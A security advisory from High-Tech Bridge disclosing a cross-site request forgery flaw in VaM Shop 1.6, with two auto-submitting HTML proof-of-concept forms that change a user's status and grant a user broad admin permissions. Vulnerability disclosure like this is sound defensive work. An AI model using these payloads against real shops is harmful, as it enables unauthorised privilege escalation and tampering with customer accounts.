XSRF (CSRF) in VaM Shop

[advisory () htbridge ch]

Vulnerability ID: HTB22780
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_vam_shop.html
Product: VaM Shop
Vendor: Vamsoft ( http://vamshop.ru/ ) 
Vulnerable Version: 1.6 and Probably Prior Versions
Vendor Notification: 28 December 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "admin/accounting.php" script to properly verify the source of HTTP 
request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based 
authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available. Change user status:

<form action="http://host/admin/customers.php?page=1&cID=USERID&action=statusconfirm"; method="post" name="main">
<input type="hidden" name="status" value="0">
</form>
<script>
document.main.submit();
</script>

Change user permissions:

<form action="http://host/admin/accounting.php?cID=USERID&action=save"; method="post" name="main" 
enctype="multipart/form-data">
<input type="hidden" name="access[]" value="configuration">
<input type="hidden" name="access[]" value="modules">
<input type="hidden" name="access[]" value="customers">
<input type="hidden" name="access[]" value="start">
<input type="hidden" name="access[]" value="content_manager">
<input type="hidden" name="access[]" value="categories">
</form>
<script>
document.main.submit();
</script>